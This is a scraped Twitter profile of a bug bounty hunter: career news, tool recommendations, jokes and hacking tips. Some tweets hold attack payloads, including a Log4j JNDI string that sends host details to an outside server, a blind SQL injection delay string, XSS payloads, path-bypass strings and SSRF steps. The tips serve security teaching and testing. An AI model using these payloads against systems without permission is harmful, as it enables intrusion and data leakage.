Patrik Fehrenbach Profile Banner
Patrik Fehrenbach Profile
Patrik Fehrenbach

@ITSecurityguard

29,880
Followers
285
Following
1,100
Media
4,610
Statuses

rɪsˈpɒnsəbl dɪsˈkləʊʒə

Freiburg
Joined January 2013
Don't wanna be here? Send us removal request.
Pinned Tweet
@ITSecurityguard
Patrik Fehrenbach
11 months
Just launched a community discord for Practical Bug Bounty 👇 and a website: and a Repository with content: (not in sync) For anyone who wants to contribute to code, ideas, or content feel free to join ♥️
Tweet media one
5
38
183
@ITSecurityguard
Patrik Fehrenbach
2 years
This is your yearly reminder that ALL Udemy Bug Bounty courses are a waste of money. The content you need is out there, completely for free. Don't believe me? Here is a list of the best Bug Bounty Ressources out there 🧵👇 #bugbountytips #BugBounty
105
540
2K
@ITSecurityguard
Patrik Fehrenbach
2 years
@samwcyo @Google Hello, this is Patrik from the Google. I sent u the wire information in DM, please return ASAP.
21
6
1K
@ITSecurityguard
Patrik Fehrenbach
4 years
I compiled a mind-map of all the tools I use for my day to day Bug Bounty journey :) Please let me know if you find his helpful 👐 🥰🔐 full resolution of the image here:
Tweet media one
22
385
1K
@ITSecurityguard
Patrik Fehrenbach
1 year
SQLI on Google (: Flow: I found an old subdomain. I discovered the parameter "q" and injected the classic payload '. After obtaining the injected result, I initiated the exploitation. #bugbounty #bugbountytips
Tweet media one
80
118
1K
@ITSecurityguard
Patrik Fehrenbach
4 years
🥳 New Blogpost! 🥳 How I made more than $30K with Jolokia CVEs Big Thanks to @yaworsk @damian_89_ @un4gii @jstnkndy
Tweet media one
15
350
966
@ITSecurityguard
Patrik Fehrenbach
3 years
Here are some ideas for potential attack surfaces for Log4J: in your robots.txt 😏 in your dns records (txt...) in your email headers in your usernames in your passwords in your headers in your e-mail addresses in your files in your SSL Certificates in your EXIF #log4j
14
222
890
@ITSecurityguard
Patrik Fehrenbach
5 years
Since absolutely nobody asked for it: I am creating a Youtube channel for tutorials on Android/iOS/ and Bug Bounties in general! (may need to change the intro though) sorry @LiveOverflow @NahamSec If you have any topics I should cover, let me know :)
21
137
800
@ITSecurityguard
Patrik Fehrenbach
4 years
I just uploaded some of the most common file types for my Patrik's Bug Bounty Tools mind map here: SVG: PDF: XMIND: PNG: enjoy! 🥰🥳👑 #bugbountytips #BugBounty
Tweet media one
10
287
756
@ITSecurityguard
Patrik Fehrenbach
5 years
dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE 👈 #bugbounty #bugbountytip
31
143
743
@ITSecurityguard
Patrik Fehrenbach
6 years
I recently scored a 4000$ bounty by using visual recon :-) here's a guide on how to do it: Visual Recon – A beginners guide: … enjoy!
11
271
700
@ITSecurityguard
Patrik Fehrenbach
3 years
Want to make easy money online? 1. Copy + Paste 2. Make Udemy Course 3. $$$
Tweet media one
34
82
685
@ITSecurityguard
Patrik Fehrenbach
3 years
#bugbountytip #bugbounty #pii #critical #bugbountytips GET /api/users/1 (where I'm user 1) -> HTTP 200 GET /api/users/;/2 -> HTTP 100 GET /api/users/;;/2 -> HTTP 200 GET /api/users/;;;/2 -> HTTP 300 GET /api/users/;;;;/2 -> HTTP 400 GET /api/users/;;;;;/2 -> HTTP 500
27
199
680
@ITSecurityguard
Patrik Fehrenbach
3 years
trying to test every header of a website for #log4j ? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips
Tweet media one
Tweet media two
Tweet media three
10
211
662
@ITSecurityguard
Patrik Fehrenbach
2 years
Play games, do CTFs, code, go outside and enjoy the weather, listen to music, cook, read, ANYTHING But please don't hack billion dollar companies for absolutely nothing. #nomorefreebugs #bugbountytip #bugbountytips (1)
Tweet media one
25
110
630
@ITSecurityguard
Patrik Fehrenbach
4 years
18
141
622
@ITSecurityguard
Patrik Fehrenbach
4 years
Bug Bounty these days: recon |xargs| grep -ax( “$sub.example.com) &> /dev/null > outtmp1.txt | httprobe -c 10000000000000 > gau | screenshots -/outdir1/as> xssscnner300 < "vulntest.txt" | nuclei -T $TARGET | masscan --rate 9999999999 | sort -uqa >/tmp/ > all_final_final.html
22
162
579
@ITSecurityguard
Patrik Fehrenbach
2 years
I found an API that would take an ID parameter as input to show the User details, so obviously I have tried to change it to a different ID - didn't work. What did work though: id=-1 17MB JSON response, someone will have a fun week ahead. #BugBounty #bugbountytips
Tweet media one
14
78
567
@ITSecurityguard
Patrik Fehrenbach
5 years
Sentry Blind SSRF ( /) 1. cat aquatone/*/urls.txt | grep sentry 2. Burpsuite 3. Send it to Repeater 4. Change the value of filename: to a url (or similar) 5. Wait for a connection 6. 👻
Tweet media one
10
236
535
@ITSecurityguard
Patrik Fehrenbach
11 months
After the whole paid courses drama yesterday I started to code a bit and came up with an idea: A free (😯) website with curated content from the bug bounty community for the bug bounty community. Course Style, beginner friendly, all in one place :) TBM (The BB Mentor) 👇
18
69
473
@ITSecurityguard
Patrik Fehrenbach
3 years
Some personal news: I'll be joining @Shopify @ShopifyEng as a Security Engineer starting January 2022 :-)
Tweet media one
60
3
464
@ITSecurityguard
Patrik Fehrenbach
1 year
I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1
24
110
450
@ITSecurityguard
Patrik Fehrenbach
3 years
Built a Raspberry Pi K3S Cluster Today! 🥰 (Club Mate bottle for scale)
Tweet media one
18
21
450
@ITSecurityguard
Patrik Fehrenbach
5 years
Google Template Injection: Status: Unfixed
Tweet media one
33
68
422
@ITSecurityguard
Patrik Fehrenbach
3 years
My highest paid bugs were the easiest ones to find 🤷‍♂️ Remember: Good bugs don't need to contain a complex exploit chain, sometimes a simple misconfiguration is enough :-) impact =! complexity
5
27
410
@ITSecurityguard
Patrik Fehrenbach
3 years
Today I took probably the hardest decision of my life so far. After almost 7 years I have resigned from my position at @Hacker0x01 🥺 Thanks to everyone who was part of the journey, it was an amazing time. I will remain in the Bug Bounty Space 😏 To new challenges! 🍾
57
2
411
@ITSecurityguard
Patrik Fehrenbach
4 years
I am using the following Data sources in Amass: wonderful guide by @hahwul how to set up the API keys:
Tweet media one
5
139
405
@ITSecurityguard
Patrik Fehrenbach
3 years
Holy! @andirrahmani1 and myself just scored a 45.000$ 😱😱😱😱😱 Bounty on @Hacker0x01 Thats a new personal record 🎉🎉🎉 Teamwork makes the dream work! #togetherwehitharder
29
9
395
@ITSecurityguard
Patrik Fehrenbach
4 years
There are exactly 2 people who should know how much you made in bounties in 2020: 1.) Yourself 2.) The Tax Office
13
19
363
@ITSecurityguard
Patrik Fehrenbach
2 years
Are you looking for a challenge and want to earn some life-changing money? We've just increased our rewards for high and critical submissions to $50,000 for high and $100,000 for critical issues 😏 let the games begin 🦾 💰
11
48
358
@ITSecurityguard
Patrik Fehrenbach
3 years
Fantastic work by @rootxharsh & @iamnoooob RCE on Apple using a 0day in Lucee for a 50k$ Bounty!
3
109
357
@ITSecurityguard
Patrik Fehrenbach
3 years
The moment you stop the Udemy Videos and open Burpsuite, is when you start making money. 🙃 #bugbountytips #BugBounty
11
26
344
@ITSecurityguard
Patrik Fehrenbach
4 years
The rewards in Bug Bounties shouldn't be your primary motivation to hunt... do it for the knowledge, the fun, the adrenaline. The money will come one day :) (promise)
18
43
335
@ITSecurityguard
Patrik Fehrenbach
4 years
mood.jpg
Tweet media one
17
33
333
@ITSecurityguard
Patrik Fehrenbach
2 years
5
63
319
@ITSecurityguard
Patrik Fehrenbach
10 months
Just released an extension for Burpsuite that allows you to quickly extract the links to Javascript files of a website from the Burpsuite Site map: #BugBounty #Pentesting #bugbountytip #bugbountytips demo 👇
6
69
328
@ITSecurityguard
Patrik Fehrenbach
7 years
Dear upcoming mobile hackers, I wrote a blogpost about bypassing Android Certificate Pinning with Frida: enjoy :-)
11
170
320
@ITSecurityguard
Patrik Fehrenbach
1 year
I asked ChatGPT to write a HackerOne Report like the hacking gods from the 90's would, was not disappointed.
Tweet media one
9
37
318
@ITSecurityguard
Patrik Fehrenbach
5 years
If you start your Bug Bounty journey with excuses, it wont work. - every bug bounty program has issues to find, public or private - Burp is amazing, Pro or Community - Bazillion Tutorials are out there, read them success is the result of hard work, you won't get it for free
4
70
311
@ITSecurityguard
Patrik Fehrenbach
4 years
Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Thank you so much @umr4n6 for the amazing bypass :] /..;/..;/ can only recommend following her :) Vogel #dreamworkmakestheteamwork
6
48
303
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
5
23
296
@ITSecurityguard
Patrik Fehrenbach
3 years
If you are intercepting a locally installed application with Burspuite and it doesn't pick up the traffic: In Firefox go to about:config and change network.proxy.allow_hijacking_localhost to true 🤗🐧 #BugBounty #bugbountytip #bugbountytips
11
84
290
@ITSecurityguard
Patrik Fehrenbach
3 years
If you struggle with setting up RogueJDNI to exploit the recent log4j vulnerability: I have written a tutorial as part of () Good Luck! 🍀
Tweet media one
4
78
290
@ITSecurityguard
Patrik Fehrenbach
4 years
For those who are wondering if you make money by creating educational content for free: My website - with 378940 unique visitors generated 40,82€ in ad revenue within the last ~5 years. Beers on me! ;-)
14
18
291
@ITSecurityguard
Patrik Fehrenbach
3 years
Bug Bounty is cool and all, but when was the last time you went hiking?
Tweet media one
24
4
277
@ITSecurityguard
Patrik Fehrenbach
4 years
Hey #h12010 , I am not allowed to participate, but I'd do the Recon with Amass: amass enum -d -dir -ip -config /root/config.ini The config file (without creds) So far: 12197 IPs, 11775 Domains 🥰
5
66
277
@ITSecurityguard
Patrik Fehrenbach
4 years
Don't drop out of college because of infosec/bug bounty #bugbountytips #bugbounty #ittakesadegree #togetherwestudyharder
19
30
273
@ITSecurityguard
Patrik Fehrenbach
2 years
I AM THE #1 USA HACKER
Tweet media one
17
15
273
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
14
17
262
@ITSecurityguard
Patrik Fehrenbach
3 years
If you remember this, you had a good youth ❣️
Tweet media one
13
42
260
@ITSecurityguard
Patrik Fehrenbach
3 years
Slides for my "Amassive Leap in Host Discovery" at this years #NahamCon2021 the Github Repo: 👁️
8
82
262
@ITSecurityguard
Patrik Fehrenbach
5 years
Work from home ❤️
Tweet media one
8
8
263
@ITSecurityguard
Patrik Fehrenbach
4 years
1 Million Reports submitted to @Hacker0x01 🤗 what an amazing milestone :). My very first Report was #20148 (N/A) to Verizon Media on July 15, 2014 - whats yours? #togetherwehitharder
49
11
256
@ITSecurityguard
Patrik Fehrenbach
4 years
My blog was down for a couple of days, some idiot bruteforced /wp-login.php with over 120.000 requests. Bro, if you want an account for my blog - just ask
Tweet media one
23
8
258
@ITSecurityguard
Patrik Fehrenbach
4 years
I don’t hack boxes, I do real hacking. It’s called VIM.
10
7
256
@ITSecurityguard
Patrik Fehrenbach
4 years
i am dying
8
54
258
@ITSecurityguard
Patrik Fehrenbach
3 years
Starting today you can chose which Triage Analyst you want on your Report on @Hacker0x01 !
Tweet media one
27
10
249
@ITSecurityguard
Patrik Fehrenbach
3 years
Test
10
18
246
@ITSecurityguard
Patrik Fehrenbach
4 years
Tweet media one
5
32
248
@ITSecurityguard
Patrik Fehrenbach
3 years
I am a Security Expert so I hereby recommend input validation of every form. 💯
9
13
242
@ITSecurityguard
Patrik Fehrenbach
4 years
Automatic discovery + exfiltration of /.git/ repositories four very easy P1s delivered right in your Slack :) curl -X POST -H 'Content-type: application/json' --data '{"text":"Hello, World!"}' YOUR_WEBHOOK_URL 👩‍🌾❤️
Tweet media one
3
77
245
@ITSecurityguard
Patrik Fehrenbach
3 years
We are hiring U.S. 🇺🇸 Security Analysts for the Triage Team at @Hacker0x01 ! 100% remote DM me if you have any questions Submit your Application on the link below 👇 #infosec #bugbountytips #infosecjobs RT would be appreciated ♻️❤️
Tweet media one
5
105
242
@ITSecurityguard
Patrik Fehrenbach
3 years
best wordlist for content discovery out there?
28
31
238
@ITSecurityguard
Patrik Fehrenbach
3 years
Just crossed 1000 Vulnerability Reports in ~9 Years of Bug Hunting 🤭 Around ~87% were valid, non duplicates 8 % Dupe 5 % Informative / Not Applicable Highest Reward = 50.000 USD Lowest Reward = 25€ 98% of the Programs were Bug Bounties, 2% VDPs #bugbounty
Tweet media one
Tweet media two
25
2
237
@ITSecurityguard
Patrik Fehrenbach
3 years
I found two more!!! #XSs #payloads 1. stop:alert() 2. posting:alert() 3. nonesense:alert() 4. bugbountytips:alert() 5. please:alert() 6. thank:alert() 7. you:alert() 8. bro:alert() #bugbountytips
21
51
233
@ITSecurityguard
Patrik Fehrenbach
8 months
Steps to gain your first CRITICAL CVE: 1. Do your absolute worst in PHP and upload it to 2. Look for mysqli_query 3. Request CVE 4. Profit. 🤡 #pentesting #BugBounty #infosecurity
Tweet media one
8
35
238
@ITSecurityguard
Patrik Fehrenbach
4 years
Enumeration of 789 root domains (passive + active discovery) using @owaspamass - this tool is a beast! took 10 minutes :)
Tweet media one
13
40
231
@ITSecurityguard
Patrik Fehrenbach
5 years
For BugBounty purposes: Jira SSRF via REST API (CVE-2019-8451) cat aquatone/*/* | grep jira curl grep evil 🦹‍♀️🧙‍♀️ If you are making $$$ out of this information, always remember whom you have to thank for that -> @chybeta 🙏
@chybeta
chybeta
5 years
CVE-2019-8451 Unauthorized SSRF via REST API /plugins/servlet/gadgets/makeRequest use @ to bypass the whitelisting ! 👇 reading resources @orange_8361
1
339
647
3
82
225
@ITSecurityguard
Patrik Fehrenbach
2 years
🧨 of the week (CW 12 / 2022) Remote Command Execution due to publicly accessible Jenkins Bounty: $3000 #bugbountytip #bugbountytipps
Tweet media one
4
23
231
@ITSecurityguard
Patrik Fehrenbach
2 years
I admire everyone that is able to do Bug Bounty full time. I try to find 1-2 critical bugs a weeks but it is insanely hard to maintain. 👊 mad respect for that
11
9
225
@ITSecurityguard
Patrik Fehrenbach
2 years
🧨💥 of the week (CW 13 / 2022) Exposed SQL Backup file ( 🇩🇪 for database 😉) Bounty: $5000 SQL Injection blind time based (' waitfor delay'0:0:20'--) Bounty $1500 TIL: Adjust your scanning for the country/language your target is using. #BugBounty
5
37
226
@ITSecurityguard
Patrik Fehrenbach
13 days
I am incredibly happy to have skipped Defcon and Blackhat to marry the love of my life ❤️ Thanks to @smiegles @lucio_89 and Melvin for travelling all the way to Germany to spend the day with us ❤️
50
0
230
@ITSecurityguard
Patrik Fehrenbach
3 years
*gets invited to a program with a shared environment* *clicks on registration* *20 XSS pop ups* *closes window* *leaves program* #BugBounty
6
10
217
@ITSecurityguard
Patrik Fehrenbach
2 years
Do you want to create a wordlist for yourself? Not sure where to start? Not sure what others are doing? Go to any public program and find a /metrics endpoint accessible, extract the paths, profit #BugBounty #bugbountytip #bugbountytips
Tweet media one
10
48
219
@ITSecurityguard
Patrik Fehrenbach
4 years
I had hundred's of DMs because of my 10k Tweet again. All I can really tell you is to throw away all of your automation, tooling, recon scripts and get hands on (!) the target. Admittedly not as convenient then waiting for results, but way more rewarding and entertaining. 🙏
7
10
216
@ITSecurityguard
Patrik Fehrenbach
4 years
Happy to announce that I will be presenting at #NahamCon2021 For all you recon hungry people - "Amassive leap in host discovery" :) stay tuned!
Tweet media one
3
16
211
@ITSecurityguard
Patrik Fehrenbach
7 months
Self-hosted Bug Bounty Box: - XSSHunter by @rs_loves_bugs - Portainer - Adguard - Nextcloud - Nginx - Docker Registry - Unifi Controller - 3x MariaDB - 3x Wordpress blogs - 5x Mail Boxes with poste - PostgreSQL - Gitlab CE - Home Assistant - Home Bridge
Tweet media one
11
10
216
@ITSecurityguard
Patrik Fehrenbach
3 years
Bug bounties are CTFs on easy mode #SorryNotSorry
12
16
212
@ITSecurityguard
Patrik Fehrenbach
3 years
Yay, I was awarded a $12,100 bounty on @Hacker0x01 ! 1 Minor Auth Bypass (1,5k) 2 Misconfigurations (2x5k) 3 Reflected XSS (3x200) 🍀 #TogetherWeHitHarder
9
3
207
@ITSecurityguard
Patrik Fehrenbach
4 years
Yay, I was awarded a $10,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Usually I don’t yay but this time, I had to Merry Christmas 🎁🎄
9
3
204
@ITSecurityguard
Patrik Fehrenbach
11 months
Just pushed a couple of features to #practicalbugbounty 1. Resources with ~300 tools + 170 Articles 2. Challenges with some free and paid CTF Platforms 3. Night Mode 4. Topic search ... Lots of content still missing but we're getting there :)
Tweet media one
5
54
204
@ITSecurityguard
Patrik Fehrenbach
6 years
LinkedIn: Linux Kernel maintainer
Tweet media one
3
31
208
@ITSecurityguard
Patrik Fehrenbach
3 years
When I turned 30 earlier this year, I made a list of things that I want to achieve in my 30's one of them was buying my own place. And today I finally did it! :-) Thank you @Hacker0x01 @Bugcrowd @zerocopter @intigriti for allowing me to make this happen ❤️
Tweet media one
27
3
205
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
1
34
205
@ITSecurityguard
Patrik Fehrenbach
4 years
If you are looking for ransom, I can tell you I don't have money. But what I do have are a very particular set of skills; skills I have acquired over a very long career. Skills that make me a nightmare for people like you. If you let my xmlrpc.php go, that'll be the end of it.
Tweet media one
15
13
196
@ITSecurityguard
Patrik Fehrenbach
7 years
This is one of the best Jailbreaking (published) research i've seen so far by @coalfirelabs
Tweet media one
1
96
190
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
5
28
195
@ITSecurityguard
Patrik Fehrenbach
8 years
Decoding a $😱,000.00 htpasswd bounty :-) new Blogpost!
12
84
196
@ITSecurityguard
Patrik Fehrenbach
4 years
Writing a new blogpost: "How I made more than 1 Million USD $$$ by asking Bug Bounty people on Twitter for Secrets and Payloads" stay tuned!
9
18
193
@ITSecurityguard
Patrik Fehrenbach
4 years
I just uploaded some scripts I am using to extend Amass: just specify the directory in your amass config: scripts_directory =/root/tools/scripts/ if you have any tool to add just let me know :) #SharingIsCaring #bugbountytips #bugbountytip
1
75
189
@ITSecurityguard
Patrik Fehrenbach
2 months
My 3-step guide for successful bug bounty hunting: 1️⃣ Write an ASM (Attack Surface Management) tool 🛠️ 2️⃣ Run it 🏃‍♂️💨 3️⃣ Report everything! 📝✅ follow me for more tips
Tweet media one
Tweet media two
Tweet media three
10
6
192
@ITSecurityguard
Patrik Fehrenbach
7 years
I am very proud to announce that I'll be joining @Hacker0x01 as a full time employee starting 1.1.2018. tl;dr patrik + hackerone = 🖖 this account will stay a personal one, and there will be new blogposts soon :-) Happy Holidays <3 #togetherwehitharder #bugbountygoals
Tweet media one
34
3
188
@ITSecurityguard
Patrik Fehrenbach
6 years
Hunters, If you want to see which of your subdomains has a webserver running, simply use the amazing httprobe by @TomNomNom cat subdomains.txt | httprobe
0
75
184
@ITSecurityguard
Patrik Fehrenbach
4 years
Yay, I was awarded 140 trays of Red Bull (3360 cans) in USD Currency on @Hacker0x01 ! #TogetherWeHitHarder
10
9
185
@ITSecurityguard
Patrik Fehrenbach
7 years
Wrote a beautiful thing with help from the awesome @_takeshix It will find AWS S3 Buckets in no time :-) will release it soon.
Tweet media one
10
76
181
@ITSecurityguard
Patrik Fehrenbach
4 years
100,000,000 Paid out in Bounties @Hacker0x01 couldn't be more proud being part of that wonderful team 🥰
Tweet media one
0
6
178
@ITSecurityguard
Patrik Fehrenbach
3 years
Tweet media one
15
22
180
@ITSecurityguard
Patrik Fehrenbach
5 years
I joined @Hacker0x01 almost 2 years ago as a full time employee and I regret nothing 🥰 incredible company & best team I could wish for 🧡
Tweet media one
6
6
181